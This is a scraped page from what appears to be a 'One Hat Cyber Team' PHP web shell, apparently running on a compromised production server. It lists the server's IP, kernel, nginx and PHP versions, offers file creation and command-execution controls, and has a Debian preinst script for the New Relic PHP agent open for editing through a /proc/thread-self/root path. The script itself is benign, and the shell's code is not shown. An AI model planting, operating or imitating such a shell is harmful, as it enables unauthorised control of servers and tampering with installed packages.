One Hat Cyber Team
Your IP :
52.15.99.234
Server IP :
104.21.48.1
Server :
Linux agrigation-prod 5.15.0-67-generic #74-Ubuntu SMP Wed Feb 22 14:14:39 UTC 2023 x86_64
Server Software :
nginx/1.24.0
PHP Version :
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
thread-self
/
root
/
var
/
lib
/
dpkg
/
info
/
Edit File:
newrelic-php5.preinst
#!/bin/sh # preinst script for newrelic-php5 # # see: dh_installdeb(1) . /usr/share/debconf/confmodule # If our log dir is currently a file move it aside if [ -f /var/log/newrelic ]; then mv -f /var/log/newrelic /var/log/newrelic.f.old > /dev/null 2>&1 fi # dh_installdeb will replace this with shell code automatically # generated by other debhelper scripts. exit 0
Simpan